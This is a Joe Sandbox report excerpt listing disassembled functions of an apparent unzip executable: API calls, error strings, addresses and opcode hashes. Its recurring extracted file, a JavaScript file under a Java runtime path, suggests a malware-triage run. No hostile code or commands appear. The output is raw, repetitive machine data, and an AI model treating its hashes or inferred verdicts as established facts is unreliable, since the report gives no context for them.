error: cannot delete old %s, xrefs: 00409FDE
%, xrefs: 00409F8D, 0040A191
error: cannot rename old %s, xrefs: 0040A169
jre/jre-1.8/lib/deploy/email.js, xrefs: 00409EF2, 00409F1C, 00409F38, 00409F55, 00409FCE, 00409FF0, 0040A008, 0040A04E, 0040A07F, 0040A141, 0040A159, 0040A219

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: Filestrcpy$CloseCreateHandleTime_chmodfopenmallocsprintfstrlen
String ID: %$error: cannot create %s$error: cannot delete old %s$error: cannot rename old %s$jre/jre-1.8/lib/deploy/email.js$jre/jre-1.8/lib/deploy/email.js
API String ID: 464791274-576279314
Opcode ID: 15770c51daf98c07b19991f2b6fded01d6c6a39a3d60b6db3fcec947a1129d3d
Instruction ID: 8c9c3a7538aacaa6e83932ae24cf1f7e350e7ca6cab1d039fa2455db72fa5620
Opcode Fuzzy Hash: 15770c51daf98c07b19991f2b6fded01d6c6a39a3d60b6db3fcec947a1129d3d
Instruction Fuzzy Hash: E87140B05097159BD310AF25D44426EBBE1BF94348F81C82FE4C8AB382DB7C98959B4F

Function 00417FC0 Relevance: 33.4, APIs: 13, Strings: 6, Instructions: 161
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

fclose.MSVCRT ref: 00417FDC
CreateFileA.KERNEL32 ref: 00418059
SetFileTime.KERNEL32 ref: 004180C5
CloseHandle.KERNEL32 ref: 004180D4

Strings

jre/jre-1.8/lib/deploy/email.js, xrefs: 00418200
%-22s , xrefs: 00418218
%, xrefs: 00418112, 00418152, 004181E7, 00418240, 004182A1
warning (%d): could not set file attributes, xrefs: 00418279
CreateFile() error %d when trying set file time, xrefs: 0041812A
jre/jre-1.8/lib/deploy/email.js, xrefs: 00418052, 0041816F, 00418208, 00418252

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleTimefclose
String ID: CreateFile() error %d when trying set file time$warning (%d): could not set file attributes$%$%-22s $jre/jre-1.8/lib/deploy/email.js$jre/jre-1.8/lib/deploy/email.js
API String ID: 1468568054-341108427
Opcode ID: cc971940c49b1b3d524c347fd70f7a23d3adcb7dc421bf583866e0306f22b56a
Instruction ID: e8b631600b01797ab143a7b2a8920756f42796536815180d209bf994d9ed6db4
Opcode Fuzzy Hash: cc971940c49b1b3d524c347fd70f7a23d3adcb7dc421bf583866e0306f22b56a
Instruction Fuzzy Hash: EB71E7B060A7119FC300AF26D14526FBBE0EF84748F91C91EE8C957251DBBD88859B9B

Function 0040AC70 Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 258
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

fflush.MSVCRT ref: 0040AD28
mblen.MSVCRT ref: 0040ADF6
_write.MSVCRT ref: 0040AE27
fflush.MSVCRT ref: 0040AE3F
_isatty.MSVCRT ref: 0040AE6E
_isatty.MSVCRT ref: 0040AE7E
_write.MSVCRT ref: 0040AE9B
fflush.MSVCRT ref: 0040AEBC
_write.MSVCRT ref: 0040AEDA
fflush.MSVCRT ref: 0040AEF9

Strings

--More--(%lu), xrefs: 0040AF11, 0040AFC8
, xrefs: 0040ACF6

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: fflush$_write$_isatty$mblen
String ID: $--More--(%lu)
API String ID: 460372848-2689476440
Opcode ID: 4185f85c62c1edf77bf63b68f3e252012f03f72eeb2b5e7fc7ca6f8d2959df6e
Instruction ID: 825228917e76dbe3ea937d31ab4b6eb55eec7d08b6c7333e95894d20c75c1313
Opcode Fuzzy Hash: 4185f85c62c1edf77bf63b68f3e252012f03f72eeb2b5e7fc7ca6f8d2959df6e
Instruction Fuzzy Hash: 01B12B70208B028BD314DF25D08476BBBE1BF84308F54892EE5D65B792D779E895CB8B

Function 00410E30 Relevance: 24.8, APIs: 11, Strings: 3, Instructions: 269
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

sprintf.MSVCRT ref: 00410FA1
sprintf.MSVCRT ref: 00410FD6
_lseeki64.MSVCRT ref: 0041102F
_read.MSVCRT ref: 0041104F
_lseeki64.MSVCRT ref: 0041112B
_read.MSVCRT ref: 0041114C
_lseeki64.MSVCRT ref: 0041121C
_read.MSVCRT ref: 0041123E

Strings

End-of-central-directory signature not found. Either this file is not a zipfile, or it constitutes one disk of a multi-part archive. In the latter case the central directory and zipfile comment will be found on the last disk(s) of this archive., xrefs: 00410FC7
%, xrefs: 00410FBA, 00410FEF
pG, xrefs: 00411098, 00411197

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: _lseeki64_read$sprintf
String ID: End-of-central-directory signature not found. Either this file is not a zipfile, or it constitutes one disk of a multi-part archive. In the latter case the central directory and zipfile comment will be found on the last disk(s) of this archive.$%$pG
API String ID: 818754875-584907992
Opcode ID: 8f2205ce84312d3b41f14af2c0f93de40c1689f3567452f56466ee4adf9a4565
Instruction ID: 2127d93138cb311b704cbd9956b2ff3a9e2b710f734931b6785c4b8617cdefb0
Opcode Fuzzy Hash: 8f2205ce84312d3b41f14af2c0f93de40c1689f3567452f56466ee4adf9a4565
Instruction Fuzzy Hash: BCC11D7050A7118FC304DF25E9846AABBF1FB98304F51A83EE58587360DF789886CB5E

Function 004072C0 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 220
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

sprintf.MSVCRT ref: 004073FB
sprintf.MSVCRT ref: 0040749D
malloc.MSVCRT ref: 00407516
strcpy.MSVCRT ref: 00407536
sprintf.MSVCRT ref: 00407589
sprintf.MSVCRT ref: 00407642
fgets.MSVCRT ref: 00407681

Strings

jre/jre-1.8/lib/deploy/email.js, xrefs: 00407387, 00407464, 004074A7, 00407562, 004075C8, 0040761B
%, xrefs: 00407414, 004075A2, 0040765B
VMS, xrefs: 004075F3
skipping: %-22s need %s compat. v%u.%u (can do v%u.%u), xrefs: 004073EC
jre/jre-1.8/lib/deploy/email.js, xrefs: 0040738F, 0040746C, 004074AF, 004074D6, 0040750A, 00407522, 0040756A, 004075D0, 00407623

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: sprintf$fgetsmallocstrcpy
String ID: skipping: %-22s need %s compat. v%u.%u (can do v%u.%u)$%$VMS$jre/jre-1.8/lib/deploy/email.js$jre/jre-1.8/lib/deploy/email.js
API String ID: 3261540506-2415716234
Opcode ID: fbb745b21d0d53ca266226d60444978215ad718e215c8a500112e3bc036a9d62
Instruction ID: 1cce3a1a06201699ddb46b6f41110d143745e5b6071d2798d4ab255245ef8686
Opcode Fuzzy Hash: fbb745b21d0d53ca266226d60444978215ad718e215c8a500112e3bc036a9d62
Instruction Fuzzy Hash: 61A1A3B09097118BC7449F25D49426ABBE0FB94314F90C92EE8D41B3D2DB7C948ADF9B

Function 004186E0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 126
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_isctype.MSVCRT ref: 0041875D
GetFullPathNameA.KERNEL32 ref: 0041878E
strncmp.MSVCRT ref: 004187B7

Strings

VFAT, xrefs: 0041885B
HPFS, xrefs: 00418881
FAT, xrefs: 00418891

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: FullNamePath_isctypestrncmp
String ID: FAT$HPFS$VFAT
API String ID: 3180554174-2180142533
Opcode ID: 1028fda5b6bfb610ccc6aa39a4e6d15ec9e43412c764d61fe45698c03d50637d
Instruction ID: 99a61673abc0c5a1c2acd5d8d236a9e2ff7433125f87771753b278e2eaa9737f
Opcode Fuzzy Hash: 1028fda5b6bfb610ccc6aa39a4e6d15ec9e43412c764d61fe45698c03d50637d
Instruction Fuzzy Hash: BA41E4705083049BD720DF25D9443ABBBE1BBC4308F58886FE4D85B391DB789986CB8A

Function 00402571 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 97
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

setlocale.MSVCRT ref: 00402598
signal.MSVCRT ref: 004025AC
signal.MSVCRT ref: 004025C0
signal.MSVCRT ref: 004025D4
signal.MSVCRT ref: 004025E8
strlen.MSVCRT ref: 00402604
_strnicmp.MSVCRT ref: 00402646
_strnicmp.MSVCRT ref: 00402662

Strings

zipinfo, xrefs: 0040263B

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: signal$_strnicmp$setlocalestrlen
String ID: zipinfo
API String ID: 1416716840-3918528525
Opcode ID: 30b8eeecef4ba764c79520e2f0af79810c937f5a8d33006cd38b73be5788f317
Instruction ID: c73b881c112cd131e1884f7d213bb66775f8ed218bea87fe7e8f8e3ea7be0e13
Opcode Fuzzy Hash: 30b8eeecef4ba764c79520e2f0af79810c937f5a8d33006cd38b73be5788f317
Instruction Fuzzy Hash: AB416DB16087219BD710AF11D64822BBBE4FF84704F81883EE9C867381D7BD9C45CB8A

Function 00418540 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 89
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNEL32 ref: 004185B6
SetFileTime.KERNEL32 ref: 00418612
CloseHandle.KERNEL32 ref: 00418621
GetLastError.KERNEL32 ref: 00418632
sprintf.MSVCRT ref: 0041864A
GetLastError.KERNEL32 ref: 0041867A
sprintf.MSVCRT ref: 00418692

Strings

%, xrefs: 00418663, 004186AB
CreateFile() error %d when trying set file time, xrefs: 00418683

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: ErrorFileLastsprintf$CloseCreateHandleTime
String ID: CreateFile() error %d when trying set file time$%
API String ID: 1843797648-3861023621
Opcode ID: c7ee43e58c41161e79803c01cf4069ccf41c3ac28cbfdf2f0f10f05b841a6783
Instruction ID: 53ed32c02ed3d46be92395dc47fd6710db6b269565334e22112b8fb321b2ce0c
Opcode Fuzzy Hash: c7ee43e58c41161e79803c01cf4069ccf41c3ac28cbfdf2f0f10f05b841a6783
Instruction Fuzzy Hash: E54127B09097119FD300EF25C15435FBBE0BF84398F85C92EE88997351D7B8D9888B8A

Function 0041A590 Relevance: 15.3, APIs: 10, Instructions: 267
timefileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNEL32 ref: 0041A607
GetFileTime.KERNEL32 ref: 0041A635
CloseHandle.KERNEL32 ref: 0041A642
FileTimeToLocalFileTime.KERNEL32 ref: 0041A83A
FileTimeToDosDateTime.KERNEL32 ref: 0041A855
FileTimeToLocalFileTime.KERNEL32 ref: 0041A896
FileTimeToDosDateTime.KERNEL32 ref: 0041A8B1
FileTimeToLocalFileTime.KERNEL32 ref: 0041A8F6
FileTimeToDosDateTime.KERNEL32 ref: 0041A911
GetFileAttributesA.KERNEL32 ref: 0041A938

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: Time$File$DateLocal$AttributesCloseCreateHandle
String ID:
API String ID: 1378446541-0
Opcode ID: 6fe0dca72d53f5cf7c1da18d6bcabd532571f4e506acf1d2ca6bb05e051dc291
Instruction ID: 150924e0f8f808f3f64a47264dd4ccc83fc2e7cbf3192ca0f88a330a2423ee47
Opcode Fuzzy Hash: 6fe0dca72d53f5cf7c1da18d6bcabd532571f4e506acf1d2ca6bb05e051dc291
Instruction Fuzzy Hash: 87B1AEB19093508BC714EF24C4802AFBBF1BF84354F568A2EE8D547381D7399996CB8B

Function 0040A520 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 66
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_write.MSVCRT ref: 0040A542

Part of subcall function 00409B40: CharToOemA.USER32 ref: 00409B83

sprintf.MSVCRT ref: 0040AC0A
fgets.MSVCRT ref: 0040AC49

Strings

jre/jre-1.8/lib/deploy/email.js, xrefs: 0040ABE3
%, xrefs: 0040A575, 0040AC23
%s: write error (disk full?). Continue? (y/n/^C) , xrefs: 0040ABFB
jre/jre-1.8/lib/deploy/email.js, xrefs: 0040ABEB

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: Char_writefgetssprintf
String ID: %$%s: write error (disk full?). Continue? (y/n/^C) $jre/jre-1.8/lib/deploy/email.js$jre/jre-1.8/lib/deploy/email.js
API String ID: 1236552256-2870516294
Opcode ID: cae97f6fb2e939cb9d6adf40bcdd73ca045942534fac0f40d300f045bb89a765
Instruction ID: 99058788d9c33b96de13d72692777417015020edf46afe124205dba7326c56c5
Opcode Fuzzy Hash: cae97f6fb2e939cb9d6adf40bcdd73ca045942534fac0f40d300f045bb89a765
Instruction Fuzzy Hash: C1213D70609711ABC314EF15E84422FBBE1FBC8354F95C82EE48857351D7789855CB8A

Function 0040B9E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 29
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_open.MSVCRT ref: 0040B9F4
_errno.MSVCRT ref: 0040BA10
strerror.MSVCRT ref: 0040BA1A
sprintf.MSVCRT ref: 0040BA3C

Strings

%, xrefs: 0040BA55
error: cannot open zipfile [ %s ] %s, xrefs: 0040BA29

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: _errno_opensprintfstrerror
String ID: %$error: cannot open zipfile [ %s ] %s
API String ID: 1538153615-907563490
Opcode ID: b6097fac322c9bca3fda31a43408728b0893e6e17a9601ace47c0e7e043827f1
Instruction ID: f68e088650bcd59cdb19edb3d3195f385a4adb2a08100fb8ce51ce994c3e6894
Opcode Fuzzy Hash: b6097fac322c9bca3fda31a43408728b0893e6e17a9601ace47c0e7e043827f1
Instruction Fuzzy Hash: CBF0C9B4609B109FC340EF25D44122EBBE1FB84344FC1D82EE4895B351DB7C94459F9A

Function 0041F410 Relevance: 9.1, APIs: 6, Instructions: 103fileCOMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 0041F440
CreateFileA.KERNEL32 ref: 00421686
CloseHandle.KERNEL32 ref: 004216A1
SetErrorMode.KERNEL32 ref: 004216D6
free.MSVCRT ref: 004216E1
_errno.MSVCRT ref: 004216F4

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: _errno$CloseCreateErrorFileHandleModefree
String ID:
API String ID: 3408501055-0
Opcode ID: 0dccadb1d5cfc18bf30faed2a321418c635eed6dd34c731715c752c191b15088
Instruction ID: 984911460d79a66e74e3603bfe904ac68c4baa7949d614ae5da3e15fb5d6a48d
Opcode Fuzzy Hash: 0dccadb1d5cfc18bf30faed2a321418c635eed6dd34c731715c752c191b15088
Instruction Fuzzy Hash: 624153B06087108FD700EF39D18032FBAE1AF98358F954E2EE89957351D77C89498B87

Function 0041EA10 Relevance: 9.1, APIs: 6, Instructions: 55COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 0041EA39
SetErrorMode.KERNEL32 ref: 0041EA67
GetFileAttributesA.KERNEL32 ref: 0041EA72
SetErrorMode.KERNEL32 ref: 0041EA88

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: ErrorMode$AttributesFile_errno
String ID:
API String ID: 2861322981-0
Opcode ID: d556b839d094391f2c3e0a9e058343c8d03bd8ab61edb12018447849ea48645a
Instruction ID: 1ce9ef05a8d9ec4bb1f731b3e8fc2b9adf34598243f8762307b5203e92736819
Opcode Fuzzy Hash: d556b839d094391f2c3e0a9e058343c8d03bd8ab61edb12018447849ea48645a
Instruction Fuzzy Hash: BA11B6B59087508BC310BF7A944126BB6E07F84360F5A0B2EECA4073D2D77C99848B9B

Function 00407284 Relevance: 7.7, APIs: 5, Instructions: 235stringCOMMON

Download Yara Rule

APIs

strncmp.MSVCRT ref: 004068B4
_lseeki64.MSVCRT ref: 00406A29
_read.MSVCRT ref: 00406A4E
free.MSVCRT ref: 00406ABD
free.MSVCRT ref: 00406AF8

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: free$_lseeki64_readstrncmp
String ID:
API String ID: 3964922226-0
Opcode ID: 9ea8a4ce02d96fe0e74076b78ff2d103bd0ff8d26d2a0098aa459de547c0e09c
Instruction ID: cfb2a90c6822350e87870cb0c258e8cc66c69c3d73ba54112b52bd9c8adf576d
Opcode Fuzzy Hash: 9ea8a4ce02d96fe0e74076b78ff2d103bd0ff8d26d2a0098aa459de547c0e09c
Instruction Fuzzy Hash: 3E9190716093118BC720AF15D58032BF7F0BB94744F56993EED86A7391EB78EC418B8A

Function 00407246 Relevance: 7.7, APIs: 5, Instructions: 232stringCOMMON

Download Yara Rule

APIs

strncmp.MSVCRT ref: 004068B4
_lseeki64.MSVCRT ref: 00406A29
_read.MSVCRT ref: 00406A4E
free.MSVCRT ref: 00406ABD
free.MSVCRT ref: 00406AF8

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: free$_lseeki64_readstrncmp
String ID:
API String ID: 3964922226-0
Opcode ID: 258328e7eff4c201f450ea49536ff8464d3d7680454acc74029471d6b2c20d58
Instruction ID: 106f102f1f7786aaa3518ce951c76fafb6f9173b6ac97825146f8746a1aa720e
Opcode Fuzzy Hash: 258328e7eff4c201f450ea49536ff8464d3d7680454acc74029471d6b2c20d58
Instruction Fuzzy Hash: 7F919F716093118BC720AF15D58022BF7F0BB94744F46993EED86A7391EB78EC418B8A

Function 0040B6CD Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 36COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 0040B6D9
sprintf.MSVCRT ref: 0040B718
free.MSVCRT ref: 0040B746

Strings

warning: extra field too long (%d). Ignoring..., xrefs: 0040B709
%, xrefs: 0040B731

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: freemallocsprintf
String ID: %$warning: extra field too long (%d). Ignoring...
API String ID: 887708770-2790475571
Opcode ID: b59fe53478e1bb919d55290525674d21b37cc548e26269188823d049d835ee4c
Instruction ID: e791c2ed5118168b04c6b07c5b4d5a5a65caa196b4b97b4cae95a4f4d91987c8
Opcode Fuzzy Hash: b59fe53478e1bb919d55290525674d21b37cc548e26269188823d049d835ee4c
Instruction Fuzzy Hash: C901E8B06097119BD300AF66E48422ABAE0EB80358F90883FE48997251DB7CC9408B9F

Function 0040BB20 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

_lseeki64.MSVCRT ref: 0040BB75
_read.MSVCRT ref: 0040BB9A
sprintf.MSVCRT ref: 0040BC11

Strings

%, xrefs: 0040BC2A

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: _lseeki64_readsprintf
String ID: %
API String ID: 2890209744-1230660975
Opcode ID: 9802b09eef59982462ae03f66879d5e1d8144ea5b2f83204e79db9c80abc309d
Instruction ID: 317e113213da8fd6f8dab4324d922e6d1db244acfb4774ce74024cf3a0cb0cf4
Opcode Fuzzy Hash: 9802b09eef59982462ae03f66879d5e1d8144ea5b2f83204e79db9c80abc309d
Instruction Fuzzy Hash: 2C212B706067018FC304DF29D99425ABBF2FBC4304F50E93EE485877A9DF78A8458B99

Function 00417FFE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65filetimeCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32 ref: 00418059
SetFileTime.KERNEL32 ref: 004180C5
CloseHandle.KERNEL32 ref: 004180D4
SetFileAttributesA.KERNEL32 ref: 00418260
GetLastError.KERNEL32 ref: 00418270
sprintf.MSVCRT ref: 00418288

Strings

